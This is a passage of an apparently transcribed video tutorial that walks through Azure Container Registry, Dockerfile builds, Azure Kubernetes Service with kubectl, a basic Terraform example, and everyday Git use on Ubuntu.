them in a central location that's reachable on the network by other admins or developers that might want to access those customized container images. So let's continue with this here in the Azure cloud. So I'll tie this to a resource group. I'll call it Standard Container Registry 172. It's going to add the .azurecr.io DNS suffix by default, where Azure CR stands for Azure Container Registry. For the location, I'll leave it on East US. I'll click Next for networking. Because I'm using a standard SKU, a lot of these options aren't available, and that's fine. I'm not going to add tags. Let's get to Review and Create, and let's create our Azure Container Registry. That should only take a few moments, and once it's complete, it says your deployment is complete. We can click Go to Resource to open the properties of that container registry, but in the future, we could also go to the All Resources view, which is available in our left-hand navigator, and bear in mind that can be collapsed or opened. In the All Resources view, we could search for any part of the name, and then there's our container registry. I could click to open up its properties, and there we go. The primary thing I'm interested in identifying here, first of all, is whether or not we have any repositories. Well, of course, we don't have any. We've just created the registry. However, to access this registry, over on the left, I'm going to scroll up and click Quick Start. Here we've got a step-by-step list of instructions on how to work with this container registry. In step 1, it says install Docker, whether it's on the Mac, Windows, or Linux platforms. Well, we've already got Docker installed on a Linux host. This we can verify on the Linux host in many ways, including just running sudo docker. There you go. It returns back the CLI. And if I run sudo service docker status, it shows as being active and running. So back in the Azure portal, that's step number 1 taken care of. Step number 2, run the hello world base image. Well, we don't have to do that. Step number 3, log into your container registry. This one is going to be important. Notice the syntax, docker, login, and the example here even includes the specific name of our container registry. I'm going to go ahead and select that and copy it. But I'm going to click Access Keys over on the left under Settings because I want to enable the admin user. The username then becomes the name of our registry, and then we've got 2 possible passwords. We can use either one. They're both valid. There are 2 because you can rotate one to change it periodically for security reasons, while the other would remain valid. So back on our Docker host, I'm going to run sudo, and then I'll paste in our docker login command. Enter. It wants a username. Well, the username is simply the name of our registry. Well, the username is the name of our registry. That in, and the password is available back here in the portal. We can choose either one, so I'll copy one of them, and I'll paste it back here. Okay, login succeeded. What does this mean? Well, what it means is we can begin to work with container images and populate repositories in the registry. If we go back to the quick start here in the portal for our container registry, in order to push container images to the registry, maybe you've got some customized container images, first thing you have to do is change the prefix with the registry login URI. So notice, for example, this is done with the docker tag command as per what we're being told in step 4. Docker tag, you refer to the current name of the container image you have on your host. Let's say it's called hello-world. And when you tag it, you're basically renaming it. What you're adding as the prefix is the DNS name of the container registry, followed by a slash, and then the name you want to call it. In this case, they're just calling it hello-world again. After you've run docker tag to do that, then you can simply issue the docker push command with the new name. And because the new name contains as a prefix the location or identity of the Azure Container Registry, it knows where to go. Let's try this out. Back here on my Docker host, I'm going to run sudo docker images to see what we've got. Okay, let's say I want to push the Alpine local container image up to my repository. So I need to do a sudo docker tag. It's currently called Alpine. After that, I'll specify the DNS name of my container registry, followed by a slash, and let's say I'm going to call it my-alpine once it's up there in the container registry. So now, if I do an sudo docker images, we've got not only the original Alpine container image here available locally, but also our essentially renamed or retagged version, which we can push up to the container registry using sudo docker push, and then we simply reference the newly tagged name of our container image. Now, normally what you would do is perhaps customize an image or build it from scratch using a Docker file, whatever the case might be. But once you've deemed it as being valuable, you can push it up to your repository in this way. Now, because this is so tiny, it doesn't take very long. Let's go check our work in the web browser in the Azure portal. So back here in the portal, if I scroll down in the left-hand navigator, remember how previously we went to repositories, but there was nothing there. Notice what shows up now, my-alpine. Now, if I click on it to open it up, the only version we have currently is the latest version it shows here. In this demonstration, I'm going to be working with a Docker file. A Docker file is a text file that's literally named Docker file, all one word, no spaces. What is it for? A Docker file contains the instructions that you can use to build your own container image. Of course, it might refer to an existing container image as a source starting point, but beyond that, you can specify commands you want to run, files you want to be injected into the container image, and so on. Let's take a look at this. Here on my machine, what I'm going to do is run sudo nano docker file to create a brand new Docker file. In it, I'm going to add a number of keywords with values. I'll start with from. So this means from which source container image would you like to base your container image? I'm going to reach out to Docker Hub, which is implied unless we change the nomenclature or the reference of the name of the container image and it's prefixed with some other repository. So from Ubuntu colon, I want the latest version of that from Docker Hub. You can also add the maintainer keyword. Maybe I'll supply an email address. I can add comments in here just like I could for a shell script with a hashtag or pound symbol. So maybe I'll put here install dependencies, and I'm going to use the run word to run this within my new custom container image. I want to run apt update to update package repositories. And if that succeeds, I'll put in a double ampersand. What we want after that is to run apt install -y time zone data. The time zone data package is one of those things that you need to have for the Apache 2 web server to work correctly. On the next line, I'll use the run keyword again. These keywords are in uppercase letters, of course. And I'll run apt install Apache 2 -y for yes. In my current directory, and we'll look at this file in a moment, I already have a sample index.html file that I want to inject as the default web page in my container image where Apache will be installed. So copy, then index.html. So it's going to be in the same relative directory as the Docker file. I want to put that in my container image in the default location for Apache 2, which is /var/www/html/ and we'll call it index.html. On another line, I'll add cmd. I want to run a command. And in square brackets and in double quotes, I want to run Apache CTL, close quote, comma, in double quotes, -d. I want this to be running, and comma, and then in quotes, foreground. Close the square brackets. So you can run commands here. All I'm doing here is ensuring that my Apache daemon will be running. So let's get out of this and save the file. And let's take a look using Nano at the index.html file I have here. Okay, so we've got a sample web page. All it really does is set heading 2, and it says, this is Cody's sample web page. Let's get out and save that. So we've got our Docker file in the current directory. We've got any files that we want to copy into it in the same directory. They don't have to be in the same directory, but the way we wrote our Docker file, it does. So now what I'm going to do is run sudo docker images. Let's just see what we've got on this local host. All right, we've got MySQL, Caddy, Alpine, and some customized prefix for some other container registry running in the Microsoft Azure cloud. Okay, sudo docker build. The build part of the syntax is used to create a new container image from the instructions in a Docker file. -t for tag. I want to call this my Apache 2 space dot. In other words, the Docker file, literally called Docker file, all one word, is in the current directory. We can see we've got some references to some of the stuff that we specified in our Docker file, including the actual installation of the software packages for Apache. And it's copying the index.html file into the location we specified. And it looks like the Apache daemon is running. Looks like it built our container image and successfully tagged it. Let's take a look. The result here is that if we run sudo docker images, we should have a new image here, and we do. A container image called my Apache 2. Well, yeah, but does it work? Why don't we find out? Sudo docker run -detached, lowercase d, space -p for port, it's lowercase p. I want to map port 80 on my local host, colon, to port 80, because I know there's a web server stack listing on port 80 by default in the container. And it's called my Apache 2. We can even say colon latest if we want to specify the version. Now here I have an error. It looks like port 80 is already in use on this host. Oops. Let's see. sudo service Apache 2 status. Well, no, it doesn't appear that we have a web server running here, but what other containers are running? sudo docker ps. Aha. Looks like we've got one called Alpine that's running. So let's run sudo docker stop, and we'll have to refer to it not by the image name, but in this case, let's say by the randomly generated name, Naughty_Allen in this case. And if we once again run sudo docker ps, all right, it's not running. Let's try again to run our new custom container image, have it as a running container. Well, we got the message again. Well, what's interesting is this is a manager node in a Docker Swarm cluster. So if we do an sudo docker service ls or list, it looks like we've got the Caddy Docker service up and running. So let's run sudo docker service rm for remove Caddy. So now if we go back and do an sudo docker service ls, the Caddy container is not running in the cluster. Well, the Caddy container image has a web server stack. That's why port 80 was showing up as being in use. Okay, let's go back to running our custom container image. This time, no errors. Everything looks good. Now that's running in the container. We don't have an Apache web server running directly in the OS, although we are mapping port 80 in the OS. So therefore, if we run the curl command, http:// even our local IP 127.0.0.1:80, port 80, it returns back the Kodi sample web page. So we know that we have successfully built our container image from the Docker file instructions. In this demonstration, I'll be deploying a cloud-based Kubernetes cluster. Deploying anything in the cloud as a managed service means that you don't have control of the underlying virtual machines and all the details that go along with that. Sometimes that's a good thing because it means it masks the complexity of the underlying infrastructure where it might not be necessary for you to completely control that. There are certainly times when you must, but when you don't have to, these managed services are a blessing. They make things very easy. And that's what we're going to do here with Kubernetes. So here in the Azure portal, I'm going to click Create a Resource, and I'm going to search for Kubernetes, and I'm going to select Azure Kubernetes Service, otherwise just abbreviate it to AKS. So Azure Kubernetes Service, create. So we'll have to deploy this into a resource group. We can choose a cluster preset configuration. I'll just leave it on standard. For the name, I'm going to call it My Kubernetes Cluster 172. It'll be deployed in the East US region. One of the important things here is determining the version of Kubernetes that you would like to use. Depending on what kind of workloads you need to run in the Kubernetes cluster in terms of application containers, might dictate that you need a specific minimal version of Kubernetes. I'll leave the default selection. And for the primary node down below, these are the underlying nodes or virtual machine nodes, I can set the size. I can click change size link if I want to have more individual virtual machine horsepower, like CPUs, RAM. But I'll leave it as it is. I can always change it after. The scaling method here is set to auto scale. So for the node count range, I'm going to go ahead and bump that up so that we have from 1 to 2. Naturally, if you're going to be doing something very intensive like massive data analytics, then you can increase the node count. But I'll leave it at this for this example, and I'll click Review and Create. It's validating my selections. The validation has passed, so I'll go ahead and click Create to create the Kubernetes cluster. And after a minute or two, it says your deployment is complete. So we could choose Go to Resource to view its properties. We also have a Connect to Cluster button. You can do all of these things and much more at any point after the fact. For instance, if I were to go to the All Resources view, among the other resources we've deployed in our cloud subscription, if I search for Kubernetes, we also have a number of resources here shown for Kubernetes. We've got a load balancer, a virtual machine scale set, a route table, a virtual network, and of course the Kubernetes service itself, which in this case is called My Kubernetes Cluster 172. If I go into the overview of it, I can start and stop, delete the cluster. I can also choose to connect to the cluster. When I click that, it shows me how I can do it using the Cloud Shell, which is available with this icon here in the portal up at the top to the right of the search field. It's like a built-in command prompt environment accessible within this Cloud GUI. So it shows you how to set the cluster subscription and how to gain access to the cluster credentials. And then, of course, a number of sample commands, which are using the kubectl, Kubectl command line prefix, which is standard when it comes to managing a Kubernetes deployment. Let's launch the Cloud Shell icon here. First time you do it, it's going to provision some storage for use when you're in the Cloud Shell command line environment in case you need to have persistent storage for things like scripts and so on. So I'll just click Create Storage. And after a minute, it's initialized. So we're in our Cloud Shell. Now we could actually also have established a new Kubernetes cluster here from the command line. We could have done this. We could have run AZ AKS for Azure Kubernetes Service, create -- specify the resource group, let's say HQ -- name. Let's call it My AKS Cluster 178 -- node -count of 2. And we could tell it, because it's going to be using Linux underneath the hood, -- generate -ssh -keys. Let's go ahead and actually do this. It won't take very long before we get some returned JSON formatted output, which tells us that our cluster has been deployed. And we did this using the command line. That's why the prefix was AZ. That stands for Azure. So here at the command line in Cloud Shell, I could run AZ AKS, as we saw in the instructions, git -credentials to get the cluster credentials, -- resource -group is HQ. That's the resource group I deployed my cluster into. And -- name, the name of my cluster, is My AKS Cluster 178 looks like I had a typo when I created it, but we'll stick with the name here since it's already deployed. Okay, so it's merged that into my config file for Cube, which is the command line tool used to manage this. So at this point, I could just use the standard kubectl command set. This is part of Cloud Shell here. On a Linux host, this is something you might have to install. But at any rate, if I just run get nodes, it will return the fact that I've got two nodes available, two virtual machines available within my node pool. Remember, we set the node count parameter to a value of 2 when we deployed this at the command line. In this demonstration, we'll do some basic Kubernetes management with the kubectl command, spelled Kubectl. First thing we'll do here is we'll take a look at any Kubernetes clusters that we might already have deployed in the Microsoft Azure cloud. Of course, Kubernetes is not tied to Microsoft directly. You can install a Kubernetes server yourself on premises on the Linux platform. However, most public cloud providers have made it very easy to deploy this in their cloud environments as compared to setting everything up manually yourself. So if I go to the All Resources view here in the Microsoft Azure portal, and if I search for what might be in the name, like Kubernetes, I have a number of resources that show up here. Of course, I've got the actual Kubernetes cluster service object itself. One's called my AKS cluster 178. There's a little typo in the name, but that doesn't matter. And I've got another one called my Kubernetes cluster 172. We also have all of the supporting other resources that were created along with creating the cluster service, like a managed identity, if you need to give permissions to the cluster to other stuff here in the cloud, load balancers, and so on. Of course, if we click on a given Kubernetes cluster, in the overview page, we can click the connect button over on the right to get an idea of how we might use the Cloud Shell built here into the Azure portal and how we would issue commands to start working with things like getting any deployments in all namespaces in the cluster. Let's go ahead and open up the Cloud Shell by clicking the icon to the right of the search bar at the top. This gives you access to Microsoft Azure command line tools as well as basic Kubernetes command line management tools. They're already pre-installed. The first thing I'll do here in Cloud Shell is make sure I have an authenticated connection to one of my clusters. And I can do that with AZ, which stands for Azure, AKS, which stands for Azure Kubernetes Service, get-credentials, --resource-group. HQ for headquarters is the resource group into which I have previously deployed my Kubernetes cluster. And I'm going to pick on a specific cluster by its name using the --name parameter and enter. So what it's going to do is merge that as what's called the current context. So I have an authenticated management connection for my cluster. So I'll clear the screen. And at this point, I can use the kubectl command to do things like return a list of nodes in the cluster. So I have 2 active nodes that are ready within this cluster. I'm going to use the built-in Nano text editor to create a file called app1.yaml, which stands for yet another markup language. What I'm doing here is I am defining what I want to deploy into my Kubernetes cluster. So I've got the API version keyword followed by a colon, a space, and v1. Notice the v is capitalized in the word version. For the kind of deployment, so kind colon, I have pod with a capital P. Remember, a pod is a deployment unit that you can work with in Kubernetes that can reference one or more containers. Then for metadata colon, on the next line, I have name colon, space pod1. Under spec colon, I have containers colon, then dash space name colon, I want to call it app1. And the image I want to use, so image colon, is caddy colon latest. Now, what am I referring to here? I can be referring to a container image in an Azure container registry. Or I can just pull it from things like docker.hub. I'm going to press Control X, save the modified buffer, and I'll write it out to my app1 YAML file. So we're at a Linux command prompt, which is part of Cloud Shell. Here, it looks like we're set to running a bash environment. Okay, well, that's very familiar to us. Now what I want to do is run kubectl apply -lowercase f for file app1.yaml. I want to apply that configuration into my Kubernetes cluster. Notice it says that pod1 has been created. So if I were to run kubectl get pods -all -name spaces, you've got a lot of built-in default pods, but here's the one that we've created called pod1 in the default namespace. I can also run commands such as kubectl get pods -show -labels. Okay, well, this is a bit more of a smaller listing. We see the pod 1 has a status of running. If I do an ls here, I've got a file called file1, and if I cat it to show us the contents, it just says sample text. The point is this: I can use kubectl to get that into running container, which is part of a pod. So what I mean by that is I can run kubectl space cp for copy dot slash file1.txt space pod1 colon slash dash c, lowercase c, because within pod1 I want to specify a container called app1. So there are plenty of things that we can do when we want to run containerized applications in a Kubernetes cluster. You'll do this often for very large-scale busy apps that might be used for very busy websites, or might be used for large-scale data analytics. Infrastructure as code, or IAC, simply means that we've got definitions of our network infrastructure environment, things like storage, things like network configurations, even things like virtual machines, web applications. All of that stuff can be defined in files in some kind of specific format, whether it's JSON or whatever the case might be. These are stored in files, and we apply those files to create that infrastructure. And that's what we're going to be doing here using Terraform in Linux. The first thing I'm going to do is I'm going to use the wget command here in Linux, where I'm going to specify the URL from the company that deals with Terraform, that's hashicorp.com. I'm going to make sure I have the keyring file to authenticate to that repository, and I need to basically make sure that my Linux host knows about that repository so that I can go ahead and actually install Terraform. That will be our next command here. For that, I'll run sudo apt update to make sure my repository list is up to date. And if that succeeds, then we're going to run sudo apt install, and of course, we'll specify that we want to install Terraform. That won't take very long, after which we can verify our installation just by running Terraform. So Terraform space -v for verbose. It should return back the version of Terraform that we have installed. So we know that it was installed successfully then because it knows what we're talking about when we type in that command. Now, all we're going to be doing here is taking a basic look at the skeletal structure that you would use for Terraform, whether you wanted to deploy infrastructure within your on-premises data center environment or in a cloud environment, such as Google Cloud Platform, Amazon Web Services, Microsoft Azure. It doesn't matter which one. So we're just going to build a simple little file that just returns back hello world to show that we can control it and deploy that. In this case, deploy that simply means show up the message using Terraform. So sudo nano for the text editor. I'm going to create a file here called test.tf. Terraform definition files usually have a .tf file extension. In here, I'm going to use the provider keyword to specify I want a provider of local as opposed to a cloud provider where I want to deploy infrastructure in that specific cloud. And I'll put my open curly brace on the same line. Then on the next line, version equals, and in double quotes, I'll put in tilde greater than sign, close the double quote, and 1.4. And actually, that double quote that is closing should be after the 1.4, not after the greater than sign. And on the next line, we'll close that little block with a closing curly brace. On the next line, I'll use the resource keyword. And the resource I want to refer to here is just a local file. So in double quotes, I'll specify local underscore file, then a space, and the file here, we'll call this definition block test. On the same line, open curly brace, the content in the file. So content equals, I just want it to say hello world. That's in double quotes. Then on the next line, I'll specify file name equals, I want this called test.txt. And on the next line, we'll close the entire section with a closing curly brace once again. Now, this is an oversimplified example. Realistically, you would be deploying infrastructure like virtual networks, let's say in Microsoft Azure, and storage accounts and public IP addresses and whatnot. Of course, your provider wouldn't be local. It would be different because you're using the definitions for deploying resources in a cloud environment. But at any rate, in this example, I'll press Control X here in Nano. I'll type in the letter Y to save the buffer, and I'll write that out to the test.tf file. Now, normally the next thing you do with Terraform is you run Terraform init. So it knows about our test.tf file. There's just a little message here about the version here. Even though it says it's deprecated, I know that this will work because that's the type of thing that I normally use for syntax when I specify the version. What we're looking for here down in the green text is that Terraform has been successfully initialized. So the next order of business then is to run Terraform plan. What this does is it runs, you can think of it as being like a dry run against your
Terraform files, or file in our case. We still have our little warning about the version statement being deprecated, but up above it says that the local file will be created with the content of hello world. It's even got some default permissions. We could change that, but that's the default permissions that will be created. The file name will be test.txt. However, if I do an ls of test.txt, it doesn't exist yet, because when you run Terraform plan, it's just a quick little dry run to show you what the outcome would be. How do we actually run it for real? We run it for real with Terraform apply. So down below it says, do you want to perform these actions? And we have to type in the word yes and press enter if we want to run it. Okay, so now if we use our up arrow key to go back through our command history to ls test.txt, it's there. And if we cat test.txt, of course, it returns back hello world. Again, very simple example, but all we're doing is trying to prove that we can control each phase of using Terraform so that in the end, it could realistically be used even to set up, let's say, a temporary testing sandbox environment, well, as long as you've got the definitions for creating those infrastructure resources in your Terraform files. You'll recall that Git is a version control tool, so it's often used in software development environments to track version changes. But it's not limited to just software development files. You can use it to track version changes to any type of file. Here I'm on the github.com website, where GitHub is really a collection of tools designed to work with Git. Also on github.com, if you sign up for a free account, you can also check out some repositories that you might have the ability to access and clone or download locally to work on. But in this particular example, what we're going to be doing is we're going to be getting Git installed on the Linux platform. We know there are many different distributions of Linux out there, some of which will have certain software packages installed and some of which will not. In this case, I'm using Ubuntu Linux. If I were to run git -- version, it already has Git installed. Of course, the question is it the most up-to-date version? Either way, if you don't have Git installed, or if you want to make sure you have the latest version on Linux, you can start by running sudo apt update to make sure your package repositories, your software package repository list is up to date, followed by running, of course, sudo apt either install Git if you don't have it installed, or you could run sudo apt upgrade after you've updated your repository lists. Anything for which there are updates, in this case for the cloud init container distro Docker package, it'll tell me what will be upgraded if I choose to continue. I'm not going to, since there's nothing here that affects updating the version of Git, which is really our focal point here. When you're going to work with Git, the first thing you should do is set a couple of global configuration settings. Things like your username, your email address. So if I were, for example, to run git, because we know it's there, config -- global, and then after that a space, user.name. Here I'll specify a name of Cody Blackwell. And this can be important as you start doing things like cloning or downloading repositories you have access to out on the internet, and then merging those back into the main branch if you have access to do that. So we want to be able to attribute those changes to certain persons. But that's just the username. The next thing that we really should do when we install Git is run git config, once again, -- global, but this time we should specify user.email and specify the appropriate email address. After I've done those types of things, I can check my work. And you might do this, for example, if you use a bunch of different stations and you want to make sure it's configured with the appropriate global settings for you. You can run git config -- list. Here it returns back that our username is specified, as well as the user email address. This stuff is literally stored within our home directory. So if I were to do a cat of tilde, that means home directory in Linux, /, and there's a hidden file here, which means it starts with a period, called git config, all one word. And in there, notice that's where we have our global configuration settings in terms of the name and the email address. You can also run git config -- global -- edit should you need to make changes. What that's going to do here, at least in Ubuntu Linux, is open it up in our text editor Nano. We're in the .git config file where we can make changes as appropriate. Of course, the next thing to consider is that we can also run git help to start learning about the command line syntax when working with Git. So up at the top, next to usage, we have Git and then a number of command line parameters. But we've also got the next level working commands. For example, clone. So it says clone a repository into a new directory. So for example, if we were to run git clone --help, it takes us into the help on how to run git clone for cloning a repository. So we have a number of command line parameters available for working with that. I'll press Q to get out of that. Now, there's no need to log into Git locally. There's no such concept. The only authentication that really kicks in is if you're going to be working with a remote server that hosts repositories that you want to gain access to. Now, not every remote repository hosted on a Git server requires authentication. Some are publicly available. We'll see that in other demos. And of course, if you wanted to remove Git, either because it's not working correctly or you no longer need it on this host, one of the things that you could do is run sudo apt remove and then specify Git. Of course, it'll specify the package name and also how much disk space will be freed. Of course, this is not specific to Git. This is standard removal of software packages, in this case in Ubuntu Linux. Where it asks where I want to continue, of course, in this case, I will choose no, as I want to keep Git on this machine. It was already on it in Ubuntu, but there's more work to be done with this tool set. Back here in the web browser on github.com, notice that you can search for something specifically. In this case, I've just searched for Hello World, and we have a number of repositories showing up here in the listing. You can click on a specific repository listing to get a listing of the files and directories for that specific item. And I've got a code button. If I click on the code button, notice here, when it comes to cloning the repository, such as making a copy, downloading it to a local directory on your machine, we've got the URL shown here. So back to when we were talking about using git clone, we could specify the URL after git clone to pull down a copy of that repository. In some cases where you have to authenticate, you'll have to specify credentials. But for public repositories, no such thing is needed. In this demo, I'm going to be cloning a Git repository. So we know that cloning means copy, but what further details should we know about this? Well, what cloning means in Git is that you want to copy an existing Git repository. What's a repository? A Git repository is really just a subdirectory structure containing files that you want to track the versions of. You want to be able to track changes. Now, the repository doesn't have to be out on a Git server somewhere on the internet. It might be a local Git repository on the same machine. So it can be in the local file system on my machine. It could be remotely available over the network somewhere. It doesn't matter. Either way, what you're doing is taking a copy or you are cloning that repository, that subdirectory structure, so you can work on it. In this particular example, I'm going to be cloning from github.com, although that's not the only choice available, of course. Here in GitHub, I've got a search field up at the top. I'm going to go ahead and look for Hello World. Maybe we're interested in some kind of code base that deals with the standard Hello World programming example. So I'm going to pick one of them and click on it to open it up. This one is Hello World for Node.js. So this is a repository that we are looking at here on github.com, where it could have additional subdirectories, a number of files. Remember, when you work in Linux, files that start with a period are hidden. So they won't just show up with ls. When you're working with them in your local file system, you could do things like ls-lowercase a to view all items, including those subdirectories and files that are hidden. The key here is we've got the index.js file. We've got a couple of other files like a README. We've got a column that shows how long ago this was done, so 3 years ago, 5 years ago, and so on. And notice over on the left, we are looking at the master branch. You can have subordinate branches where changes are being made, but in this case, we're looking at the master. If I click the code button on the right, it gives me various references to this repository. If I want to pull it down using HTTPS, which I do, I'll copy that by clicking the copy button. But notice you can also do it using SSH or the GitHub CLI, not to be confused with Git, which we are using at the command line. GitHub is a collection of tools that work with Git, but notice that in their example, it's not the Git command, GIT, but rather it's GH for GitHub. There's also a GUI version you can work with called GitHub Desktop. We won't be working with that. We could also choose to download a zip file of this repository, but we're going to go with the HTTPS URL reference to it instead. Now back here in Linux, remember, I can verify Git is here by running git -- version, let's say. And if I want to make sure that I have my global variable set, I can run git config -- list. So my username and my email have been set. To get to the point here, I can run git clone, and then I'm just going to paste in the HTTPS URL that points to the Hello World Node.js repository we were just looking at in the web browser on github.com. Now, this is a publicly available repository, so I don't have to specify any credentials to sign in.
Okay, it enumerated or listed or went through all of the objects, of which there are 47. It unpacked them 100%. All that should mean is that in my current directory, pwd, print working directory, I'm in my user home directory. If I do an ls, I have a subdirectory called node-hello. If I go into the node-hello directory with cd and do an ls, these are the files that we saw on the github.com website, notably index.js. Remember, we can view hidden items here with ls-a. Oh yeah, right, there's the stuff that is hidden that starts with a period in the name of the file or the directory. And if I were to cat the index.js, these are the statements that set up a little HTTP server that will display the message hello node in this particular case. Now you might be wondering, do I have to clone a repository, a remote repository, into the same local subdirectory name? The answer is no. When you're cloning a repository, I'll just go back up in the history here, you can just specify it as the last parameter to the git clone command. Let's say node-hello2. So now if I do an ls, I've got a node-hello2 directory in here. Of course, you want to be careful about where you are creating these subdirectory structures, but you have that kind of control if you need it as well when you clone a git repository. Now there's so much more you can do really. You can run git clone --help to see all of the available options for cloning repositories. As an example, you can clone a repository using the --bear parameter. All that this means is what you're really downloading is not the entire repo and all of its files, but rather the history related to that project, to its changes. So you can't edit it directly then locally because you don't have all the files as part of that repository when you bring it down in bear format. And back here in the web browser, remember when you're looking at a given repository and you click the code button, you've got the standard 3 ways to pull that down? Well, we know HTTPS is just a standard URL that normally uses port 443, SSH normally uses port 22, and using the git CLI normally uses port 9418. So you have to think very carefully about firewalls and what ports are allowed and which aren't. In this demo, I'm going to be managing a local Git repository. Remember, what we're really talking about is initializing a subdirectory that will be used for version control, version tracking of files within that Git repository or subdirectory. You can do this remotely on a server if you have access to it, but in this case, we'll be doing it locally in our Linux file system. So the first thing I'll do here is type pwd for print working directory. I'm in my home directory. You don't have to create your repositories in this location, but that's where I will in this particular case. I'm going to run makedir my first repo. That's what it's called. And I'm going to change directory into the my first repo subdirectory. Of course, if I do an ls-a here, there's nothing in here. It's an empty, newly created subdirectory. What I'm going to do now is run git space init. So what it will have done is initialized this as being a Git repository on this local machine. If I run an ls-a now, notice I've got the hidden Git directory. If I do an ls of the hidden .git subdirectory, here we've got some other files like config, description, and other subdirectories within it, such as branches, hooks, info, objects, and refs. So what we've just done is initialized a Git repository, and at the same time, it also created this as what's called a new main branch. You can branch off different parts of the repository when you make changes and want to treat it as a separate, unique entity. So here in my repository, I'm going to create a file. You could use any tool to do this, whether it's a software development type of tool. I'm just going to run sudo nano here to run the nano text editor to create a file here called hello.js. All we're going to do here is we're going to create a small little HTTP listening server on port 1111. This is all in Node.js. So I've got a couple of constants I'm creating, like HTTP import, where I'm requiring the HTTP library. I'm setting the port number to 1111. Then I'm actually running afterwards the create server method of my HTTP constant. I'm going to pass it req for request to listener on the port number I've specified and the response. So I'm setting the status code of that to 200. If you've worked a lot with HTTP, you'll know that a response code of 200 means everything's fine. I'm just going to have a message here of hello world, and then we're going to pass off that message to the web server. Then the server will be up and running on our given port. I'll use the server.listen statement to do that, and I'm going to write to the console log simply the fact that the HTTP server is now running. It doesn't really matter what is in this file. It's actually irrelevant. It's not the focal point. This isn't about Node.js. This is about creating files in Git. The files could be of any type and could contain anything. But anyhow, that's just a quick tour of what that is. Now we want to make sure that any changes to hello.js get tracked. So we want to run git add, and in this case, hello.js. Let's say I create a file here, sudo nano, let's call it hello.log, and I'll put in this is sample log text. We'll just save that out. So we've got a little log file here, hello.log, as well as hello.js. Well, I can create a file called .gitignore where I can use pattern matching to tell it which files should be excluded from tracking. For example, here in my repo directory, I'm going to run sudo nano, and I'm going to create a hidden file, so leading period, called .gitignore. In here, I'm just going to put *.log. There are other variations of what you can do, but I want to exclude any logs from being tracked here. So Control X to write that out, and yes, and save it. Okay, so now if we do an ls-a, we've also got our .gitignore file. Now, if a file is currently being tracked, you could stop that after the fact using get-rm for get-remove. But we're doing it right away using gitignore before our log files are added to be tracked. Another thing to think about when you're working with a repository are tags. If I run git space tag, it'll return any tags that might be available, if any. Now, in this repo, my first repo, there are none. But if I go to change directory .. I know I've got a repo. Notice that I get the same result, no tags, but I could add a tag. So git tag -a, let's say v1.0-m, and I'll put in a description. Let's say sample description in double quotes, enter. Now if I run git tag, it returns v1.0. So you can also add some tagging information to add some more descriptive metadata for a given repository when you're working with it at the git command line. If I change directory back into my first repo directory, so that other repository, I can run git status to see some interesting info. First of all, it tells me the branch I'm on. It says on branch master, no commits yet. However, notice it says changes to be committed, and it has a new file by the name of hello.js. But notice that hello.log is not shown here, and that's because of our .gitignore. Because remember, if I do an ls, there is a hello.log file here. However, we have chosen to not have it tracked for changes. If I were to run git space rm for remove and then specify hello.js, it tells me, well, you want me to remove it, but there are already changes that haven't yet been committed. Well, we could use the -f parameter to force the removal. In other words, to force it to be removed from being tracked. So -f at the end of that git rm command. So now if we were to run git status, notice that the hello.js file is no longer being tracked, and so as a result, it won't be committed if we were to commit the changes to this branch. All right, in this demo, we're going to focus on how to branch a Git repo and also how to merge it. And when we say repo, we mean a repository, which is essentially a subdirectory structure that will also contain files where you want to track changes to those files. Let's start here on my Linux host by typing in git space branch space -- list. Now, the first thing it tells me is, well, you are not in a Git repository subdirectory. And indeed, I'm not. If I type pwd for print working directory, I'm just in my user home directory. If I do an ls here, I've got a repo directory that I've created, that I've initialized, called my first repo. So I'm going to change directory to my first repo, clear the screen, do an ls. Okay, it looks like we've got a hello.log file. If I do an ls-a, we've also got a .gitignore file, and we've got a .git hidden directory. If I were to run now git branch -- list once again, we get nothing here. Okay, well, let's go into a different repo called node-hello. This is a repository I cloned from GitHub. So I'll just use the up arrow key. Let's run git branch -- list. Okay, it tells me then I am in the master branch. So we've had any changes committed to it, and we've got just one branch. Now, if I do an ls here in the node-hello repo, we've got some files that this repo consists of. Let's say I want to make some changes to some files in here. If this is a software code project, then maybe I'm a software developer and I want to be able to make a few changes, maybe fix a few bugs that were discovered within our code, maybe add a new feature that wasn't there previously. Whatever the case is, I want to make a change. That's usually the reason that you will branch from the master branch, create a new branch to work on. For example, I'm going to run git branch, but this time I'm not going to list. We already did that. I'm going to create a branch called my new branch. Now, if I do an ls for list, nothing has changed here in the file system. Because think of a branch just being kind of like a pointer, like a shortcut link that points to a different version in time snapshot of the main branch that you created the branch from. And that snapshot is really your changes. If I were to run the git status command, it says that I am on the branch called master. But if I were to run the git checkout command and specify the name of an existing branch, in this case, my new branch, it says it's switched to branch my new branch. So now if I run git status, I'm on the my new branch, not master anymore. Now this is interesting because git checkout is simply a way for you to switch between your different snapshots, as we've called them, of your versions of code, of your changes. So let's say I create a new file. I'm going to run sudo nano new file.txt. I'll just put some sample text in here, and I will close out and save that file. I'm going to run git add, and I'll add new file.txt so its changes get tracked. Of course, if I clear the screen to run git status, it knows about this newly tracked file that needs to be committed or saved to it. So to commit this change, it says changes to be committed. In other words, I want to save this snapshot. I would simply run git space commit, enter. So it takes me into my commit edit message file. This is normal. I'm going to go ahead and add a new commit message. I'll press Control X to save that file. Okay, we've now saved the commit, or we saved our snapshot. It says one file changed, one insertion for new file.txt. So now if I run git status, we no longer have a reference to a file that needs to be committed. I'm going to run git checkout to go back to the master branch. I'll clear the screen and I'll run git status. Okay, it says it's up to date. Now what you can do if you've got a couple of different branches with different changes, you can merge their history all together using git merge. For example, git merge, I'd specify, let's say, my new branch, and it has a reference here to the one file that really was the one that was added in our branch that we committed and now has been merged back here into master. So this gives us a general idea then of how to begin working with branches in Git. The topic gets much more involved and deeper if you actually start using it for software development, but here our goal is to have a high-level overview of how this works. If you've ever spent some time doing software development and getting components to talk together and capturing certain points of time, then you probably have experience working with hooks. What we're going to do here is talk about how to manage Git events that will trigger Git hooks. Event, of course, simply means when something specific happens. And there are many different types of events that we'll go through. We want to capture that point in time and have a script that runs automatically. Think about where this might be useful. First, I'm going to go into a repo directory. I'll do an ls. So here we've just got one file. We could add files to it, make sure they get tracked with git add, commit the changes, and all of that great stuff. But if you're making changes, let's say to scripts you're going to run in your production environment or software code that will be compiled, maybe testing, you can automate that with scripts. And you can even have that triggered so that after a successful test, it will automatically begin a software build. That's only one possible way to use this. There are plenty of ways. When you take a look at the subdirectory structure within a repository, a Git repository, so ls-a for all items, you'll have a hidden .git directory. And if we change directory into .git, clear it, and do an ls-a, we've got a number of files and directories. The one I'm interested in is the directory called hooks. It's automatically here when you initialize a repo directory the very first time with the git init command. It creates 